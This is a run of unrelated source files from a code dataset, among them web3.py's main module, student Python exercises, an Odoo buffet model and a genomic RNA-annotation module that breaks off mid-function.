    # worldLinkFramePosition,
    # worldLinkFrameOrientation,
    # worldLinkLinearVelocity,
    # worldLinkAngularVelocity) = p.getLinkState(boxId,4, computeLinkVelocity=1, computeForwardKinematics=1)
    # print(linkWorldPosition)
    p.stepSimulation()
    time.sleep(1.0/240.)
# Print the final joint positions (element [0] of each joint state tuple).
theta0, theta1, theta2, theta3 = p.getJointStates(boxId, [1,2,3,4])
print(theta0[0], theta1[0], theta2[0], theta3[0])
p.disconnect()
| cencencendi/excabot | coba.py | coba.py | py | 1,438 | python | en | code | 0 | github-code | 36 |
28798745541 | # I pledge my honor that I have abided by the Stevens Honor System. Andrew Ozsu
def count_vowels(text):
    """Return the number of lowercase vowels ('aeiou') in *text*.

    Matches the original behavior: uppercase vowels are NOT counted.
    """
    return sum(1 for ch in text if ch in "aeiou")


def _read_two_numbers():
    """Prompt for two comma-separated integers and return them as a pair."""
    # Prompt text (including its typo) kept byte-identical: it is user-facing.
    raw = input("Enter 2 numbers seperated by a comma: ")
    first, second = raw.split(",")
    return int(first), int(second)


def main():
    """Interactive menu: simple arithmetic (option 1) or string ops (option 2).

    Returns the computed value, "Invalid Input" for unknown sub-options,
    or None for the encryption branch / unknown top-level option
    (the original printed "Invalid Input" there instead of returning it).
    """
    print("For Mathematical Functions, Please Enter the Number 1")
    print("For String Operations, Please Enter the Number 2")
    x = int(input("Enter Value: "))
    if x == 1:
        print("For Addition, Please Enter the Number 1")
        print("For Subtraction, Please Enter the Number 2")
        print("For Multiplication, Please Enter the Number 3")
        print("For Division, Please Enter the Number 4")
        y = int(input("Enter Value: "))
        # Dispatch table replaces four near-identical copy-pasted branches.
        operations = {
            1: lambda a, b: a + b,
            2: lambda a, b: a - b,
            3: lambda a, b: a * b,
            4: lambda a, b: a / b,
        }
        if y not in operations:
            return "Invalid Input"
        a, b = _read_two_numbers()
        return operations[y](a, b)
    elif x == 2:
        print("To Determine the Number of Vowels in a String; Enter the Number 1")
        print("To Encrypt a String; Enter the Number 2")
        z = int(input("Enter Value: "))
        if z == 1:
            return count_vowels(input("Enter String: "))
        if z == 2:
            # "Encrypt" by printing each character's code point minus 4,
            # reproducing the original's exact spacing.
            for ch in input("Enter String: "):
                print(" ", ord(ch) - 4, end=" ")
        else:
            return "Invalid Input"
    else:
        print("Invalid Input")
| Eric-Wonbin-Sang/CS110Manager | 2020F_quiz_2_pt_2_submissions/ozsuandrew/test2pt2.py | test2pt2.py | py | 2,279 | python | en | code | 0 | github-code | 36 |
def print_result(result):
    """Print the size of *result*, then every element on its own line."""
    lines = [str(len(result))]
    lines.extend(str(entry) for entry in result)
    print("\n".join(lines))
# Read the number of reserved guests, then the reservation list itself.
n = int(input())
guests = []
for _ in range(n):
    guests.append(input())
# Arrivals follow, one per line, until the 'END' sentinel; each arrival is
# checked off the reservation list.
while True:
    guest = input()
    if guest == 'END':
        break
    if guest in guests:  # O(n) membership test per arrival; fine for small n
        guests.remove(guest)
# Remaining entries are the no-shows, reported alphabetically.
guests = sorted(guests)
print_result(guests)
| AntoniyaV/SoftUni-Exercises | Advanced/Python-advanced-course/02_tuples_and_sets/lab/05_softuni_party.py | 05_softuni_party.py | py | 336 | python | en | code | 0 | github-code | 36 |
30488234848 | from eth_abi.codec import (
ABICodec,
)
from eth_utils import (
add_0x_prefix,
apply_to_return_value,
from_wei,
is_address,
is_checksum_address,
keccak as eth_utils_keccak,
remove_0x_prefix,
to_bytes,
to_checksum_address,
to_int,
to_text,
to_wei,
)
from hexbytes import (
HexBytes,
)
from typing import Any, cast, Dict, List, Optional, Sequence, TYPE_CHECKING
from eth_typing import HexStr, Primitives
from eth_typing.abi import TypeStr
from eth_utils import (
combomethod,
)
from ens import ENS
from web3._utils.abi import (
build_default_registry,
build_strict_registry,
map_abi_data,
)
from web3._utils.decorators import (
deprecated_for,
)
from web3._utils.empty import (
empty,
)
from web3._utils.encoding import (
hex_encode_abi_type,
to_hex,
to_json,
)
from web3._utils.rpc_abi import (
RPC,
)
from web3._utils.module import (
attach_modules,
)
from web3._utils.normalizers import (
abi_ens_resolver,
)
from web3.eth import (
Eth,
)
from web3.geth import (
Geth,
GethAdmin,
GethMiner,
GethPersonal,
GethShh,
GethTxPool,
)
from web3.iban import (
Iban,
)
from web3.manager import (
RequestManager as DefaultRequestManager,
)
from web3.net import (
Net,
)
from web3.parity import (
Parity,
ParityPersonal,
ParityShh,
)
from web3.providers import (
BaseProvider,
)
from web3.providers.eth_tester import (
EthereumTesterProvider,
)
from web3.providers.ipc import (
IPCProvider,
)
from web3.providers.rpc import (
HTTPProvider,
)
from web3.providers.websocket import (
WebsocketProvider,
)
from web3.testing import (
Testing,
)
from web3.types import ( # noqa: F401
Middleware,
MiddlewareOnion,
)
from web3.version import (
Version,
)
if TYPE_CHECKING:
from web3.pm import PM # noqa: F401
def get_default_modules() -> Dict[str, Sequence[Any]]:
    """Return the default module layout attached to a Web3 instance.

    Maps attribute name -> (module class,) or (module class, submodules dict),
    the shape expected by ``attach_modules``.
    """
    parity_children = {
        "personal": (ParityPersonal,),
        "shh": (ParityShh,),
    }
    geth_children = {
        "admin": (GethAdmin,),
        "miner": (GethMiner,),
        "personal": (GethPersonal,),
        "shh": (GethShh,),
        "txpool": (GethTxPool,),
    }
    modules: Dict[str, Sequence[Any]] = {
        "eth": (Eth,),
        "net": (Net,),
        "version": (Version,),
        "parity": (Parity, parity_children),
        "geth": (Geth, geth_children),
        "testing": (Testing,),
    }
    return modules
class Web3:
    """Main entry point of the library.

    Bundles a provider, the request manager, ABI codecs, the attached API
    namespaces (eth, net, geth, parity, ...) and assorted encoding/currency/
    address utilities exposed as static methods.
    """
    # Providers
    HTTPProvider = HTTPProvider
    IPCProvider = IPCProvider
    EthereumTesterProvider = EthereumTesterProvider
    WebsocketProvider = WebsocketProvider
    # Managers
    RequestManager = DefaultRequestManager
    # Iban
    Iban = Iban
    # Encoding and Decoding
    toBytes = staticmethod(to_bytes)
    toInt = staticmethod(to_int)
    toHex = staticmethod(to_hex)
    toText = staticmethod(to_text)
    toJSON = staticmethod(to_json)
    # Currency Utility
    toWei = staticmethod(to_wei)
    fromWei = staticmethod(from_wei)
    # Address Utility
    isAddress = staticmethod(is_address)
    isChecksumAddress = staticmethod(is_checksum_address)
    toChecksumAddress = staticmethod(to_checksum_address)
    # mypy Types
    eth: Eth
    parity: Parity
    geth: Geth
    net: Net
    def __init__(
        self,
        provider: Optional[BaseProvider] = None,
        middlewares: Optional[Sequence[Any]] = None,
        modules: Optional[Dict[str, Sequence[Any]]] = None,
        ens: ENS = cast(ENS, empty)
    ) -> None:
        """Wire up the request manager, attach API modules, set the ABI codec."""
        self.manager = self.RequestManager(self, provider, middlewares)
        if modules is None:
            modules = get_default_modules()
        attach_modules(self, modules)
        self.codec = ABICodec(build_default_registry())
        self.ens = ens
    @property
    def middleware_onion(self) -> MiddlewareOnion:
        # Middleware stack lives on the request manager.
        return self.manager.middleware_onion
    @property
    def provider(self) -> BaseProvider:
        return self.manager.provider
    @provider.setter
    def provider(self, provider: BaseProvider) -> None:
        self.manager.provider = provider
    @property
    def clientVersion(self) -> str:
        """Return the connected node's client version string (RPC call)."""
        return self.manager.request_blocking(RPC.web3_clientVersion, [])
    @property
    def api(self) -> str:
        """Return this library's own version string."""
        from web3 import __version__
        return __version__
    @staticmethod
    @deprecated_for("keccak")
    @apply_to_return_value(HexBytes)
    def sha3(primitive: Optional[Primitives] = None, text: Optional[str] = None,
             hexstr: Optional[HexStr] = None) -> bytes:
        # Deprecated alias for keccak (historically misnamed "sha3").
        return Web3.keccak(primitive, text, hexstr)
    @staticmethod
    @apply_to_return_value(HexBytes)
    def keccak(primitive: Optional[Primitives] = None, text: Optional[str] = None,
               hexstr: Optional[HexStr] = None) -> bytes:
        """Compute the keccak-256 hash of exactly one of primitive/text/hexstr."""
        if isinstance(primitive, (bytes, int, type(None))):
            input_bytes = to_bytes(primitive, hexstr=hexstr, text=text)
            return eth_utils_keccak(input_bytes)
        raise TypeError(
            "You called keccak with first arg %r and keywords %r. You must call it with one of "
            "these approaches: keccak(text='txt'), keccak(hexstr='0x747874'), "
            "keccak(b'\\x74\\x78\\x74'), or keccak(0x747874)." % (
                primitive,
                {'text': text, 'hexstr': hexstr}
            )
        )
    @combomethod
    @deprecated_for("solidityKeccak")
    def soliditySha3(cls, abi_types: List[TypeStr], values: List[Any]) -> bytes:
        # Deprecated alias for solidityKeccak.
        return cls.solidityKeccak(abi_types, values)
    @combomethod
    def solidityKeccak(cls, abi_types: List[TypeStr], values: List[Any]) -> bytes:
        """
        Executes keccak256 exactly as Solidity does.
        Takes list of abi_types as inputs -- `[uint24, int8[], bool]`
        and list of corresponding values -- `[20, [-1, 5, 0], True]`
        """
        if len(abi_types) != len(values):
            raise ValueError(
                "Length mismatch between provided abi types and values.  Got "
                "{0} types and {1} values.".format(len(abi_types), len(values))
            )
        # combomethod: callable on the class (no ENS resolution) or on an
        # instance (w3 available for ENS name resolution).
        if isinstance(cls, type):
            w3 = None
        else:
            w3 = cls
        normalized_values = map_abi_data([abi_ens_resolver(w3)], abi_types, values)
        hex_string = add_0x_prefix(HexStr(''.join(
            remove_0x_prefix(hex_encode_abi_type(abi_type, value))
            for abi_type, value
            in zip(abi_types, normalized_values)
        )))
        return cls.keccak(hexstr=hex_string)
    def isConnected(self) -> bool:
        """Delegate connectivity check to the active provider."""
        return self.provider.isConnected()
    def is_encodable(self, _type: TypeStr, value: Any) -> bool:
        """Return True if *value* can be ABI-encoded as *_type* by the codec."""
        return self.codec.is_encodable(_type, value)
    @property
    def ens(self) -> ENS:
        # Lazily build an ENS instance from this Web3 unless one was injected.
        if self._ens is cast(ENS, empty):
            return ENS.fromWeb3(self)
        else:
            return self._ens
    @ens.setter
    def ens(self, new_ens: ENS) -> None:
        self._ens = new_ens
    @property
    def pm(self) -> "PM":
        # Package management is opt-in; see enable_unstable_package_management_api().
        if hasattr(self, '_pm'):
            # ignored b/c property is dynamically set via enable_unstable_package_management_api
            return self._pm  # type: ignore
        else:
            raise AttributeError(
                "The Package Management feature is disabled by default until "
                "its API stabilizes. To use these features, please enable them by running "
                "`w3.enable_unstable_package_management_api()` and try again."
            )
    def enable_unstable_package_management_api(self) -> None:
        """Attach the experimental PM module to this instance (idempotent)."""
        from web3.pm import PM  # noqa: F811
        if not hasattr(self, '_pm'):
            PM.attach(self, '_pm')
    def enable_strict_bytes_type_checking(self) -> None:
        """Swap the ABI codec for one that rejects lenient bytes coercions."""
        self.codec = ABICodec(build_strict_registry())
| MLY0813/FlashSwapForCofixAndUni | FlashSwapForCofixAndUni/venv/lib/python3.9/site-packages/web3/main.py | main.py | py | 7,774 | python | en | code | 70 | github-code | 36 |
21459344158 | from odoo import models, fields
class BuffetMenu(models.Model):
    # Odoo model for buffet menu types (breakfast, lunch, ...); records are
    # displayed by their 'type' field via _rec_name.
    _name = 'buffet.menu'
    _description = 'Buffet Menu'
    _rec_name = 'type'
    # Display name of the menu type.
    type = fields.Char(string="MenuType",help="menu type like breakfast,"
                                              " lunch etc ")
class BuffetMenuItems(models.Model):
    # Odoo model linking products to a menu type at a buffet location;
    # records display as their menu type via _rec_name.
    _name = 'buffet.menu.item'
    _description = 'Buffet Menu Items'
    _rec_name = 'menu_type_id'
    # Products offered on this menu line.
    product_ids = fields.Many2many('product.product', string="Item",
                                   help="menu items in buffet line")
    menu_type_id = fields.Many2one('buffet.menu', string="Menu Type",
                                   help="type of menu")
    buffet_location_id = fields.Many2one('buffet.location', string="Buffet "
                                                                   "Location")
    # NOTE(review): capitalized field name breaks the snake_case convention
    # (user_id); renaming would change the DB column, so it is kept as-is.
    User_id = fields.Many2one('res.users', string="Responsible Person",
                              help="responsible person of buffet")
| Spitzodoo1/fisa-inversiones | buffet/models/buffet_menu.py | buffet_menu.py | py | 984 | python | en | code | 0 | github-code | 36 |
22217047125 | import csv
from ast import literal_eval
import math
import sys
sys.path.append('..')
from scoring.img_ref_builder import ImgRefs
class PatchImageRef(ImgRefs):
    """Reference record for one bordered probe image and its patch geometry.

    Iterating the object yields its fields in a fixed order, which defines
    the column order when rows are written out (e.g. to CSV).
    """

    def __init__(self, id, bordered_img_shape, patch_window_shape,
                 probe_mask_file_name, original_img_shape,
                 border_top, border_left):
        # NOTE(review): super().__init__() is not called -- presumably ImgRefs
        # needs no initialisation; confirm against scoring.img_ref_builder.
        self.probe_file_id = id
        self.bordered_img_shape = bordered_img_shape
        self.patch_window_shape = patch_window_shape
        self.probe_mask_file_name = probe_mask_file_name
        self.original_img_shape = original_img_shape
        self.border_top = border_top
        self.border_left = border_left

    def __iter__(self):
        record = (self.probe_file_id, self.bordered_img_shape,
                  self.patch_window_shape, self.probe_mask_file_name,
                  self.original_img_shape, self.border_top, self.border_left)
        return iter(record)
class PatchImageRefFactory():
    """Builders for PatchImageRef objects, from arguments or from a CSV dump."""

    @staticmethod
    def create_img_ref(id, bordered_img_shape, patch_window_shape,
                       probe_mask_file_name, original_img_shape,
                       border_top, border_left):
        """Thin pass-through constructor, kept for API symmetry with the CSV loader."""
        return PatchImageRef(id, bordered_img_shape, patch_window_shape,
                             probe_mask_file_name, original_img_shape,
                             border_top, border_left)

    @staticmethod
    def get_img_refs_from_csv(csv_path, starting_index, ending_index, target_index=-1):
        """Load PatchImageRefs from CSV rows [starting_index, ending_index).

        ending_index == -1 means "read to end of file"; the actual end index
        is returned alongside the list. target_index selects which column
        holds the mask file name (-1 -> column 3, otherwise column 0).

        Bug fix: the original compared ints with ``is`` (identity), which is
        only reliable for small interned integers; ``==`` is used instead.
        """
        if ending_index == -1:
            ending_index = math.inf
        with open(csv_path, 'r') as f:
            reader = csv.reader(f)
            next(reader)  # skip the header row
            patch_img_refs = []
            ti = 3 if target_index == -1 else 0
            for i, row in enumerate(reader):
                if i >= starting_index and i < ending_index:
                    patch_img_refs.append(PatchImageRefFactory.create_img_ref(
                        row[0],
                        literal_eval(row[1]),
                        literal_eval(row[2]),
                        row[ti],
                        literal_eval(row[4]),
                        int(row[5]),
                        int(row[6])
                    ))
                if i == ending_index:
                    break
        if ending_index == math.inf:
            ending_index = len(patch_img_refs)
        return patch_img_refs, ending_index
| adibMosharrof/medifor | localization/src/patches/patch_image_ref.py | patch_image_ref.py | py | 2,387 | python | en | code | 0 | github-code | 36 |
from itertools import count
import sys
# Fast input: read whole lines straight from stdin (competitive-programming idiom).
def input(): return sys.stdin.readline().rstrip()
# Read the array, the query count, and the queried values.
n = int(input())
nums = list(map(int, input().split()))
q = int(input())
lNums = list(map(int, input().split()))
mx = max(max(nums), max(lNums))
# dp is seeded with the multiplicity of each value in the input array.
dp = [0] * (mx+1)
for a in nums:
    dp[a] += 1
# For every value i, accumulate dp over i's divisor pairs (j, i//j) found up
# to sqrt(i). NOTE(review): dp entries for smaller values have already been
# augmented when they are read here -- presumably the cascading accumulation
# is exactly what the contest problem requires; verify against the editorial.
for i in range(2, mx+1):
    for j in count(1):
        if j*j > i: break
        if i % j == 0:
            dp[i] += dp[j]
            if j*j != i and j != 1:
                dp[i] += dp[i//j]
# One answer per queried value, space-separated on a single line.
print(*(dp[i] for i in lNums))
# 해설에 적힌 코드. 엄청난 테크닉이다...! | kmgyu/baekJoonPractice | Arena solvedAC/2023 arena 1/g.py | g.py | py | 567 | python | en | code | 0 | github-code | 36 |
11614487445 | # Escribir un programa que pregunte por consola el precio de un producto en euros con dos decimales y muestre por pantalla
# el número de euros y el número de céntimos del precio introducido.
def split_price(price):
    """Split a price into whole euros and remaining cents.

    Returns (euros, centimos), with centimos rounded to 2 decimals.
    Bug fix: the original computed ``round(price % euros, 2)``, which raises
    ZeroDivisionError for prices below 1 euro; the fractional part is now
    taken as ``price - euros`` (identical result for euros >= 1).
    """
    euros = int(price)
    centimos = round(price - euros, 2)
    return euros, centimos


def run():
    """Ask for a price in euros and report its euro and cent components."""
    price = round(float(input("Introduzca el precio del producto en euros: ")), 2)
    euros, centimos = split_price(price)
    print("El numero de euros es: "+str(euros))
    print("El numero de centavos es: "+str(centimos))


if __name__ == "__main__":
    run()
24916338388 | #A个a,B个b
# Print A copies of 'a' and B copies of 'b', one per line, greedily avoiding
# three identical letters in a row for as long as both letters remain.
A = 3
B = 8
flaga = 0  # consecutive 'a's just printed
flagb = 0  # consecutive 'b's just printed
while A>0 and B>0:
    if (A>=B or flagb == 2) and flaga !=2: # a has majority, or b was already printed twice; and a not printed twice in a row
        print('a')
        A -= 1
        flaga += 1
        flagb = 0
    else:
        print('b')
        B -= 1
        flagb += 1
        flaga = 0
# Leftovers once one letter runs out: the remaining letter is dumped as-is
# (the three-in-a-row rule can no longer be satisfied).
if (A != 0):
    for i in range(A):
        print('a')
if (B != 0):
    for i in range(B):
        print('b')
| hehehahaha/study-python | ab.py | ab.py | py | 413 | python | en | code | 0 | github-code | 36 |
185118540 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 10 13:55:54 2021
@author: 44797
"""
from collections import Counter
import collections
class Solution:
    def frequencySort(self, nums):
        """Sort *nums* by increasing value frequency; equal-frequency values
        are ordered by decreasing value (LeetCode 1636 tie-break).

        Replaces the original OrderedDict + double-sort construction with a
        single stable sort using the composite key (frequency, -value),
        which produces the identical ordering in one pass.
        """
        counts = Counter(nums)
        return sorted(nums, key=lambda x: (counts[x], -x))
# Demo driver: [1,1,2,2,2,3] sorts to [3, 1, 1, 2, 2, 2] (ascending frequency).
nums = [1,1,2,2,2,3]
sol = Solution().frequencySort(nums)
print(sol)
2251918328 | """
For the purpose of annotating RNA types for genomic regions.
"""
#from xplib import DBI
#from cogent.db.ensembl import HostAccount, Genome
def overlap(bed1,bed2):
    """
    This function compares overlap of two Bed object from same chromosome
    :param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :returns: boolean -- True or False

    Example:

    >>> from xplib.Annotation import Bed
    >>> from AnnoMax import overlap
    >>> bed1=Bed(["chr1",10000,12000])
    >>> bed2=Bed(["chr1",9000,13000])
    >>> print overlap(bed1,bed2)
    True
    """
    try:
        return (bed1.stop>bed2.start) and (bed1.start<bed2.stop)
    except (AttributeError, TypeError):
        # bed2 (or bed1) may be None or lack start/stop coordinates.
        # Narrowed from a bare ``except`` so unrelated bugs are not hidden.
        return False
def IsProperStrand(bed1, bed2):
    """
    This function determines whether the two Bed object is at the same strand
    :param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :returns: boolean -- True or False ('.' on either side matches any strand)

    Example:

    >>> from xplib.Annotation import Bed
    >>> from AnnoMax import IsProperStrand
    >>> bed1=Bed(["chr1",10000,12000,'-'])
    >>> bed2=Bed(["chr1",9000,13000,'+'])
    >>> print IsProperStrand(bed1,bed2)
    False
    """
    try:
        return (bed1.strand == bed2.strand) or (bed1.strand == '.') or (bed2.strand == '.')
    except AttributeError:
        # Missing strand information (e.g. bed2 is None) counts as compatible.
        # Narrowed from a bare ``except`` so unrelated bugs are not hidden.
        return True
def IsPartOf(bed1, bed2):
    """
    This function determines whether bed1 is part of bed2
    :param bed1: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :param bed2: A Bed object from `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :returns: boolean -- True or False

    This function allows N overhang nucleotides (on one end only).

    Example:

    >>> from xplib.Annotation import Bed
    >>> from AnnoMax import IsPartOf
    >>> bed1=Bed(["chr1",10000,12000])
    >>> bed2=Bed(["chr1",9000,13000])
    >>> print IsPartOf(bed1,bed2)
    True
    """
    N=5  # tolerated overhang in nucleotides
    try:
        return ((bed1.stop <= bed2.stop + N) and (bed1.start >= bed2.start)) or ((bed1.stop <= bed2.stop) and (bed1.start >= bed2.start - N))
    except (AttributeError, TypeError):
        # bed2 (or bed1) may be None or lack coordinates -- not contained.
        # Narrowed from a bare ``except`` so unrelated bugs are not hidden.
        return False
def Subtype(bed1,genebed,typ):
    """
    This function determines intron or exon or utr from a BED12 file.
    :param bed1: A Bed object defined by `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
    :param genebed: A Bed12 object representing a transcript defined by xplib Annotaton.Bed with information of exon/intron/utr from an BED12 file
    :param typ: str -- transcript biotype (e.g. "protein_coding"); selects the
        strict (containment) or loose (overlap) test below
    :returns: str -- RNA subtype: "intron"/"exon"/"part_exon"/"utr3"/"utr5"

    Example:

    >>> from xplib.Annotation import Bed
    >>> from xplib import DBI
    >>> from AnnoMax import Subtype
    >>> bed1=Bed(["chr13",40975747,40975770])
    >>> a=DBI.init("../../Data/Ensembl_mm9.genebed.gz","bed")
    >>> genebed=a.query(bed1).next()
    >>> print Subtype(bed1,genebed)
    "intron"
    """
    N=0.85  # minimum overlap fraction of bed1 for a "part_exon" call
    subtype="intron"  # default when bed1 hits the gene but no exon/UTR test succeeds
    if typ != "protein_coding":
        # Non-coding transcripts: require bed1 to be (nearly) contained in an
        # exon of the UTR/exon structure (IsPartOf allows 5 nt of overhang).
        if overlap(bed1,genebed.utr3()):
            for i in genebed.utr3().Exons():
                if IsPartOf(bed1,i):
                    subtype="utr3"
        elif overlap(bed1,genebed.utr5()):
            for i in genebed.utr5().Exons():
                if IsPartOf(bed1,i):
                    subtype="utr5"
        else:
            for i in genebed.Exons():
                if IsPartOf(bed1,i):
                    subtype="exon"
                    break
    else:
        # Protein-coding transcripts: UTR calls use the looser overlap test.
        # print bed1
        # print genebed.utr3().start, genebed.utr3().stop
        if overlap(bed1,genebed.utr3()):
            # print "If passed"
            # print len(genebed.utr3().Exons())
            for i in genebed.utr3().Exons():
                if overlap(bed1,i):
                    subtype="utr3"
        elif overlap(bed1,genebed.utr5()):
            for i in genebed.utr5().Exons():
                if overlap(bed1,i):
                    subtype="utr5"
        else:
            # Contained in an exon -> "exon". Otherwise, if at least N (85%)
            # of bed1 lies within its best-overlapping exon -> "part_exon".
            max_overlap=0
            flag=0
            for i in genebed.Exons():
                if IsPartOf(bed1,i):
                    subtype="exon"
                    flag=1
                    break
                elif overlap(bed1,i):
                    nt=min(bed1.stop,i.stop)-max(bed1.start,i.start)
                    if nt > max_overlap:
                        max_overlap = nt
            if flag==0 and max_overlap/float(bed1.stop-bed1.start)>=N:
                subtype="part_exon"
    return subtype
def optimize_annotation(c_dic,bed,ref_detail):
    '''
    This function will select an optimized annotation for the bed region from the genes in c_dic.
    It will select the annotation based on a list of priorities.
    The list of priorities is: exon/utr of coding transcript > small RNA > exon of lincRNA > small RNA > exon/utr of nc transcript > intron of mRNA > intron of lincRNA.
    Genes on the same strand as the read(ProperStrand) will always have higher priority than those on the opposite strand (NonProperStrand). Repeat elements have the lowest priority (except rRNA_repeat according to the annotation files)

    :param c_dic: dict mapping category key ("rRNA", "short_nc",
        "protein_coding", "lincRNA", "other", ...) to a list of candidate
        records, each of the form [type, name, subtype, strandcol]
    :param bed: the Bed region being annotated
    :param ref_detail: DBI handle to the BED12 transcript annotation, queried
        to refine intron/exon/UTR subtypes
    :returns: [type, name, subtype, strandcol] (empty strings if c_dic has no
        usable candidate)

    NOTE(review): this file uses xrange, so it targets Python 2.
    '''
    #keep only one record for each type is enough
    #print c_dic
    ftyp=""
    fname=""
    fsubtype=""
    fstrandcol=""
    # Highest priority: rRNA -- return its first record immediately.
    if "rRNA" in c_dic:
        ftyp=c_dic["rRNA"][0][0]
        fname=c_dic["rRNA"][0][1]
        fsubtype=c_dic["rRNA"][0][2]
        fstrandcol=c_dic["rRNA"][0][3]
        return [ftyp,fname,fsubtype,fstrandcol]
    # Next: small non-coding RNAs (snoRNA/miRNA/snRNA).
    if "short_nc" in c_dic and ftyp=="":
        ftyp=c_dic["short_nc"][0][0]
        fname=c_dic["short_nc"][0][1]
        fsubtype=c_dic["short_nc"][0][2]
        fstrandcol=c_dic["short_nc"][0][3]
        return [ftyp,fname,fsubtype,fstrandcol]
    # Protein-coding candidates: walk the list backwards and refine each
    # gene's subtype against the BED12 transcript models.
    if "protein_coding" in c_dic:
        for ind in xrange(len(c_dic["protein_coding"])-1,-1,-1):
            gene=c_dic["protein_coding"][ind]
            # print gene
            flag=0      # 1: exon/utr of a coding transcript; 2: exon/utr of a nc transcript
            pe_flag=0   # 1: bed covers only part of a coding exon
            tmp=""
            for hit in ref_detail.query(bed):
                tempname=hit.id.split("&")
                #print tempname
                if gene[1]==tempname[0]:
                    gene[2]=Subtype(bed,hit,tempname[1])
                    if gene[2]!="intron":
                        if tempname[1]=="protein_coding" and gene[2]!="intron" and gene[2]!="part_exon":
                            #exon or utr of coding transcript
                            flag=1
                            break
                        elif tempname[1]!="protein_coding":
                            #exon or utr of non-coding transcript. Record the subtype. If the bed doesn't overlap with any exons, it wll be annotated as protein_coding-noncoding
                            tmp=gene[2]
                            flag=2
                        elif tempname[1]=="protein_coding" and gene[2]=="part_exon":
                            #the bed cover part of an exon. If it doesn't overlap with utr or exon of other transcript, it will be annotated as exon.
                            pe_flag=1
            # print flag,pe_flag
            # print gene[2]
            if flag==1 and gene[2]!="intron": ##if gene type == protein_coding
                ftyp=gene[0]
                fname=gene[1]
                fsubtype=gene[2]
                fstrandcol=gene[3]
                break
            elif pe_flag==1:
                # Partial exon coverage counts as "exon" unless a better hit
                # is found later in the loop.
                ftyp=gene[0]
                fname=gene[1]
                fsubtype="exon"
                fstrandcol=gene[3]
            elif flag==2:
                c_dic["protein_coding-noncoding"]=[["protein_coding-noncoding",gene[1],tmp,gene[3]]]
                ##it's fine to keep the same gene in the "protein_coding" list because intron has the lowest priority. All of the subtype should be intron.
            elif gene[2]==".":
                #if the bed is in intergenic region, remove this gene from the dictionary.
                c_dic["protein_coding"].remove(gene)
                if not c_dic["protein_coding"]:
                    c_dic.pop("protein_coding",None)
        del gene
    # lincRNA candidates: accept the first gene whose refined subtype is exonic.
    if "lincRNA" in c_dic and ftyp=="":
        for gene in c_dic["lincRNA"]:
            flag=0
            for hit in ref_detail.query(bed):
                if flag==0:
                    tempname=hit.id.split("&")
                    if gene[1]==tempname[0]:
                        gene[2]=Subtype(bed,hit,tempname[1])
                        if gene[2]!="intron":
                            flag=1
            if gene[2]!="intron":
                gene[2]="exon"
                ftyp=gene[0]
                fname=gene[1]
                fsubtype=gene[2]
                fstrandcol=gene[3]
                break
        del gene
    # Fallback: take the first record of the highest-priority remaining
    # category (these are the intron / other low-priority cases).
    if ftyp=="":
        if "other" in c_dic:
            gene=c_dic["other"][0]
        elif "protein_coding-noncoding" in c_dic:
            gene=c_dic["protein_coding-noncoding"][0]
        elif "protein_coding" in c_dic:
            gene=c_dic["protein_coding"][0]
        elif "lincRNA" in c_dic:
            gene=c_dic["lincRNA"][0]
        try:
            ftyp=gene[0]
            fname=gene[1]
            fsubtype=gene[2]
            fstrandcol=gene[3]
        except:
            # No candidate at all: fall through with empty fields.
            pass
    return [ftyp,fname,fsubtype,fstrandcol]
def annotation(bed,ref_allRNA,ref_detail,ref_repeat):
"""
This function is based on :func:`overlap` and :func:`optimize_annotation` and :func:`Subtype` functions to annotate RNA type/name/subtype for any genomic region.
This function will first find genes with maximum overlap with bed, and use the function optimize_annotation to select an optimized annotation for the bed with following steps:
* Find hits (genes) with overlaps larger than Perc_overlap of the bed region length and build dic
* Find hits (genes) with overlaps between (Perc_max * max_overlap, max_overlap) and build P_dic (for ProperStrand), N_dic (for NonProperStrand).
* Find an annotation for the bed region among the hits.
:param bed: A Bed object defined by `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (in BAM2X).
:param ref_allRNA: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object (from BAM2X) for bed6 file of all kinds of RNA
:param ref_detail: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object for bed12 file of lincRNA and mRNA with intron, exon, UTR
:param ref_detail: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object for bed6 file of mouse repeat
:returns: list of str -- [type,name,subtype, strandcolumn]
Example:
>>> from xplib.Annotation import Bed
>>> from xplib import DBI
>>> from AnnoMax import annotation
>>> bed=Bed(["chr13",40975747,40975770])
>>> ref_allRNA=DBI.init("all_RNAs-rRNA_repeat.txt.gz","bed")
>>> ref_detail=DBI.init("Data/Ensembl_mm9.genebed.gz","bed")
>>> ref_repeat=DBI.init("Data/mouse.repeat.txt.gz","bed")
>>> print annotation(bed,ref_allRNA,ref_detail,ref_repeat)
["protein_coding","gcnt2","intron","ProperStrand"]
"""
Perc_overlap=0.7
Perc_max=0.85
flag=0
typ = "non"
name = "."
subtype = "."
strandcol = "ProperStrand"
ftyp = ""
fname = ""
fsubtype = ""
fstrandcol = ""
bed_len=bed.stop-bed.start+1
max_overlap = 0 # find annotation with largest overlap
overlap_dic={} #key: overlap length element: list of genes
P_dic={} #dictionary of properstrand. Key: type
N_dic={} #dictionary of nonproperstrand. Key type
##construct overlap_dic
for hit in ref_allRNA.query(bed):
overlap = min(hit.stop,bed.stop)-max(hit.start,bed.start)
if overlap >= Perc_overlap * bed_len and overlap!=0:
name=hit.id.split(".",1)[1]
typ=hit.id.split(".")[0]
if not IsProperStrand(hit, bed):
strandcol = "NonProperStrand"
else:
strandcol = "ProperStrand"
if overlap not in overlap_dic:
overlap_dic[overlap]=[]
overlap_dic[overlap].append([typ,name,subtype,strandcol])
if overlap > max_overlap:
max_overlap = overlap
##construct P_dic and N_dic
#print overlap_dic
for key in overlap_dic.keys():
# print key
if key >= max_overlap * Perc_max:
for gene in overlap_dic[key]:
